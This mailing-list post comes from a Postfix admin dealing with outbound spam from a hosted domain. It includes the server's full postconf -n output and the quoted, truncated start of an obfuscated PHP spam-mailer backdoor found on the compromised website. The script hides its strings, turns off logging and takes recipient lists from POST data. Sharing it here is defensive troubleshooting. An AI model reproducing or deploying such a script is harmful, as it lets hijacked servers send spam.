Re: Temporarily block domain.tld from sending?

lists Mon, 07 Oct 2013 19:13:02 -0700

On Tue, October 8, 2013 11:31 am, Simon B wrote:
> On 8 Oct 2013 01:54, "Voytek" <li...@sbt.net.au> wrote:


> spam from many.na...@adomain.tld, how best to prevent any outbound mails
> from adomain.tld till I can look at this?

> Postfix stop
>
>
> Then post your postconf -n and a log snippet of an outgoing span press.

Simon, thanks

--------------------
# postconf -n
address_verify_sender = $double_bounce_sender
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
anvil_rate_time_unit = 1800s
body_checks = pcre:/etc/postfix/body_checks
body_checks_size_limit = 150000
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
debug_peer_level = 2
disable_vrfy_command = yes
header_checks = pcre:/etc/postfix/header_checks
home_mailbox = Maildir/
html_directory = /usr/share/doc/postfix-2.4.5-documentation/html
local_recipient_maps = unix:passwd.byname $alias_maps
local_transport = local
mail_owner = postfix
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
message_size_limit = 15360000
mime_header_checks = pcre:$config_directory/mime_headers.pcre
mydestination = $myhostname, localhost.$mydomain
myhostname = server.tld
mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1
myorigin = $mydomain
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme
recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps
recipient_delimiter = +
sample_directory = /etc/postfix/samples
sender_bcc_maps = hash:/etc/postfix/bcc_s_maps
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtp_tls_cert_file = $smtpd_tls_cert_file
smtp_tls_key_file = $smtpd_tls_key_file
smtp_tls_loglevel = 1
smtp_tls_note_starttls_offer = yes
smtp_tls_security_level = may
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtp_tls_session_cache_timeout = 3600s
smtpd_client_connection_rate_limit = 50
smtpd_data_restrictions = reject_unauth_pipelining, permit
smtpd_helo_required = yes
smtpd_helo_restrictions = permit_mynetworks,    permit_sasl_authenticated,
   check_helo_access ${RE}helo.re
smtpd_recipient_restrictions = permit_sasl_authenticated,
permit_mynetworks, reject_unauth_destination, check_recipient_access
hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender,
reject_non_fqdn_recipient, reject_invalid_helo_hostname,
reject_non_fqdn_helo_hostname, reject_unknown_sender_domain,
reject_unknown_reverse_client_hostname, reject_unlisted_recipient,
check_sender_access hash:/etc/postfix/freemail_access,
check_recipient_access pcre:/etc/postfix/recipient_checks.pcre,
check_helo_access hash:/etc/postfix/helo_checks, check_sender_access
hash:/etc/postfix/sender_checks, check_client_access
hash:/etc/postfix/client_checks, check_client_access
pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org,
reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender
dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client
bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org,
check_policy_service inet:127.0.0.1:10031, permit
smtpd_restriction_classes = from_freemail_host
smtpd_sasl_auth_enable = yes
smtpd_sasl_authenticated_header = yes
smtpd_sasl_local_domain =
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt
smtpd_tls_key_file = /etc/pki/tls/certs/server.key
smtpd_tls_loglevel = 1
smtpd_tls_received_header = yes
smtpd_tls_security_level = may
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtpd_tls_session_cache_timeout = 36000s
strict_rfc821_envelopes = yes
tls_random_source = dev:/dev/urandom
transport_maps = hash:/etc/postfix/transport
unknown_local_recipient_reject_code = 550
virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf
virtual_gid_maps = static:5000
virtual_mailbox_base = /var/mail/vhosts
virtual_mailbox_domains =
proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf
virtual_mailbox_limit = $message_size_limit
virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
virtual_minimum_uid = 5000
virtual_transport = lmtp:unix:private/dovecot-lmtp
virtual_uid_maps = static:5000

--------------------

there is a php script on their web as so, I'm trying to see how it was
uploaded at this point:

---------------------
 head  xmlrpcVZY.php
<?php
@error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL);
@ini_set('log_errors',0); if (count($_POST) < 2) {
die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false;
foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case
chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 =
$v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case
chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' ||
$v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 =
n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 =
n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 =
urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) !=
false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 =
count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; }
for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 =
$v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1))
continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b,
$vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
$va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc);
$v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' ||
$va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c;
} else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else {
$vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203);
$v3a5939e4 = next(explode('@', $v01b6e203)); }
preg_match('|<USER>(.*)</USER>|
snip
---------------------

(i wasn't able to include above as I was on 4" mobile screen, sorry)

Re: Temporarily block domain.tld from sending?

Reply via email to